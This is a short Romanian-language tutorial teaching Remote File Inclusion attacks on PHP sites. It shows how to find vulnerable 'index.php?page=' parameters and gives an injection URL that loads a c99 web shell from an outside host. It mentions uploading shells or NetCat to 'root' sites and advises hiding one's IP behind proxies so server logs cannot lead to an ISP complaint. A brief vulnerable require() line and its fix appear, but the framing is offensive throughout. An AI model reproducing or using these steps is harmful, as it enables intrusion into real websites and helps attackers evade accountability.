RFI = Remote File Inclusion LFI = Local File Inclusion Cu aceasta vulnerabilitate, puteti introduce un shell, sau un script php intr-un anumit site vulnerabil. Deobicei, cei care folosesc RFI, uploadeaza un shell sau NetCat (pentru a roota site-ul). Acum o sa va explic cum sta treaba cu RFI-ul. Cum puteti sa va dati seama ca un site ar putea fi vulnerabil la rfi ? Foarte Simplu, Vulnerabilitatea se afla in index.php?page= sau etc.Sunt diferite pagini.De ex. mai exista si index.php?path=, etc. Un site Vulnerabil la RFI ar trebui sa arate cam asa : http://www.yoursite.com/index.php?page= Pentru a testa manual daca site-ul este vulnerabil la RFI : http://www.yoursite.com/index.php?page=[evil_shell] [evil_shell] = Calea (Path-ul) Catre Shell.De exemplu http://shockingsoft.uv.ro/c99.txt In fisierul PHP, vulnerabilitatea este : require($page . “pagina.php”); Repararea bug-ului este : require(”pagina.php”); HINT 1 : Nu este vorba de host, este vorba de scriptul PHP HINT 2 : Ar fi bine sa va ascundeti IP-ul cu Proxy, Hide IP Platinium sau AOL. De ce ? Pentru ca log-uriile sa salveaza pe server, in log arata absolut ce face fiecare user, chiar daca intri pe index.php, in log scrie.Si dupaia puteti fi reclamat la ISP, etc.